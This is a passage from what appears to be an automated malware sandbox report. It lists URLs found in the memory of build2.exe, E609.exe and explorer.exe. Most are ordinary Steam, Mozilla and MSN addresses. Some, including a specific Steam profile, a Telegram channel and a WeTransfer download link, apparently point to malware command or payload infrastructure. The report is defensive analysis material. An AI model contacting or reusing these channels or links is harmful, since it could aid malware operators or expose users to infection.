Source: build2.exe, 00000013.00000003.2122792993.0000000000843000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast.akamaized.net
Source: build2.exe, 00000013.00000003.2122792993.0000000000843000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/
Source: build2.exe, 00000013.00000002.2663278860.00000000007B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/$ix-
Source: build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.0000000000838000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.0000000000838000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/discussions/
Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/login/ho
Source: build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199689717899
Source: build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/m
Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.0000000000838000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/market/
Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.0000000000838000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: build2.exe, 00000012.00000002.2109889853.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2210740943.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156939086.0000000000812000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.0000000000400000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000080E000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2175286059.0000000000812000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199689717899
Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199689717899(J$-
Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199689717899/badges
Source: build2.exe, 00000013.00000003.2210740943.0000000000829000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2175286059.0000000000829000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156939086.0000000000829000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199689717899/inventory/
Source: build2.exe, 00000013.00000003.2210740943.0000000000810000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156939086.0000000000812000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000080E000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2175286059.0000000000812000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/765611996897178992
Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.0000000000838000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/workshop/
Source: build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/
Source: build2.exe, 00000013.00000003.2122792993.0000000000843000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;
Source: build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/about/
Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.0000000000838000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/explore/
Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2175286059.0000000000829000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156939086.0000000000829000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/legal/
Source: build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.0000000000838000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/mobile
Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.0000000000838000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/news/
Source: build2.exe, 00000013.00000003.2156801668.0000000000838000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.0000000000838000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.0000000000838000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/stats/
Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.0000000000838000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.0000000000838000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: build2.exe, 00000013.00000003.2514800173.000000001E1F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: build2.exe, 00000013.00000003.2514800173.000000001E1F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: build2.exe, 00000013.00000003.2330175693.00000000008EF000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2319193965.00000000008E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: build2.exe, 00000013.00000003.2330175693.00000000008EF000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2319193965.00000000008E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: build2.exe, 00000012.00000002.2109889853.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/copterwin
Source: E609.exe, 0000000F.00000002.2883282984.000000000310E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wetransfer.com/downloads
Source: E609.exe, 0000000F.00000002.2883282984.00000000030B0000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 0000000F.00000002.2877170339.0000000000892000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 0000000F.00000002.2877170339.00000000008AA000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 00000011.00000002.2876679850.0000000000753000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wetransfer.com/downloads/33b490a613f49fa190924f199d2c079e20240512191214/caaf73
Source: explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000001.00000000.1692249717.000000000C557000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/L
Source: explorer.exe, 00000001.00000000.1692249717.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2706345491.000000000900D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://word.office.com
Source: build2.exe, 00000013.00000002.2663278860.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.0000000000892000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: build2.exe, 00000013.00000003.2373219434.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2373406242.0000000000903000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: build2.exe, 00000013.00000003.2341625569.0000000000924000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: build2.exe, 00000013.00000002.2663278860.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.0000000000892000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: build2.exe, 00000013.00000003.2122792993.0000000000843000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: build2.exe, 00000013.00000003.2341625569.0000000000924000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: build2.exe, 00000013.00000003.2122792993.0000000000843000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptcha/
Source: build2.exe, 00000013.00000003.2122792993.0000000000843000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: build2.exe, 00000013.00000003.2122792993.0000000000843000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: build2.exe, 00000013.00000002.2651384676.0000000000572000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: build2.exe, 00000013.00000003.2514800173.000000001E1F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: build2.exe, 00000013.00000002.2651384676.0000000000572000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/ost.exe
Source: build2.exe, 00000013.00000002.2651384676.0000000000572000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: build2.exe, 00000013.00000002.2651384676.0000000000572000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/1
Source: build2.exe, 00000013.00000002.2651384676.0000000000572000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/86-6cb1-4744-a649-0782dee5c50c
Source: build2.exe, 00000013.00000003.2514800173.000000001E1F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: build2.exe, 00000013.00000002.2651384676.0000000000572000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: build2.exe, 00000013.00000003.2514800173.000000001E1F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: build2.exe, 00000013.00000002.2651384676.0000000000572000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/vchost.exe
Source: build2.exe, 00000013.00000002.2651384676.0000000000572000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: build2.exe, 00000013.00000002.2651384676.0000000000572000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: build2.exe, 00000013.00000002.2651384676.0000000000572000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/chost.exe
Source: build2.exe, 00000013.00000003.2514800173.000000001E1F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
Source: explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
Source: explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1688547736.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
Source: explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
Source: explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/crime/fingerprints-on-ransom-n
Source: explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
Source: explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
Source: explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/technology/do-parallel-universes-exist/ss-AA17h065
Source: explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
Source: explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
Source: explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
